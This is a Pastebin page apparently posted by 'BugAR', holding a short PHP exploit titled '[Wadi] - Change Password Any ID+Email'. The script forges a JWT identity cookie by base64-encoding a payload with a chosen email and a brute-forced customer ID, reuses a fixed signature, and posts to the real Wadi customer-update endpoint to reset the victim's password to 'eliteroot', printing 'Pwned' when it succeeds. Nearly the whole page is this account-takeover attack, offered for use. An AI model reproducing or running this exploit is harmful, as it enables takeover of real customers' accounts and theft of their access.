Advertisement
BugAR

[Wadi] - Change Password Any ID+Email

May 12th, 2017
304
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.52 KB | None | 0 0
  1. localhost/wadi.php?id= <[brute Here]
  2.  
  3. <?
  4. $email = ""; # Here Email
  5. $id = $_GET['id'];
  6. # Json Web Token
  7. $decrypt = '
  8. {
  9.  "username": "'.$email.'",
  10.  "roles": [
  11.    "ROLE_CUSTOMER"
  12.  ],
  13.  "customerId": '.$id.',
  14.  "exp": "1495828867",
  15.  "iat": "1494619267"
  16. }
  17. ';
  18. $encrypt = base64_encode($decrypt);
  19. /////////////////////////////////////////////////////
  20. /* Here Request Brute Force */
  21. $wadi = curl_init();
  22. curl_setopt($wadi, CURLOPT_URL, "https://my.wadi.com/customers/update/");
  23. curl_setopt($wadi, CURLOPT_SSL_VERIFYPEER, false);
  24. curl_setopt($wadi, CURLOPT_RETURNTRANSFER, 1);
  25. curl_setopt($wadi, CURLOPT_FOLLOWLOCATION, 1);
  26. curl_setopt($wadi, CURLOPT_HTTPHEADER, array(
  27.     'Host: my.wadi.com',
  28.     'Content-Type: application/json;charset=utf-8',
  29.     'Cookie: identity=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXUyJ9.'.$encrypt.'.W1tS_wnX6j9q2bcWt9wiTpSOCFVzZCs08ySeI63NclCSYjCwYd_GrQw3gPYYz3A2e9HUUJO5_0dVPB-clyPkV6jLxQ4TB2zj7zkBm3x1781XkN2m-ahShGaliw4P661U2akrOXi6ir7Z0Ienr0kcpJi7UAuUrnGgHwutAgEe8aDPrG8q74VQ9mzJCoGDzaBqhvsCrhRfVem4tyWrzUYU6rbXtYNpRSkUtalG4ydnXLtYU6IaiCc8vYFNktms1FCnHeEI8tppqEHG6b8Zm8d4SUA_E0XxGB0OD1dRXjNdurcsWg3bib1eHa9SGzEWJ494O3NHYN2NOuNQGo5Y9ioZxQ;',
  30.     'Connection: keep-alive'
  31.     ));
  32. curl_setopt($wadi, CURLOPT_POSTFIELDS, '{"password":"eliteroot"}');
  33. curl_setopt($wadi, CURLOPT_HEADER, 1);
  34. curl_setopt($wadi, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  35. $source = curl_exec($wadi);
  36. if(eregi('"email":"'.$email.'"', $source))
  37.     {
  38.         echo "Pwned";
  39.     }
  40.     else
  41.     {
  42.         echo "Failed";
  43.     }
  44. curl_close($wadi);
  45. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement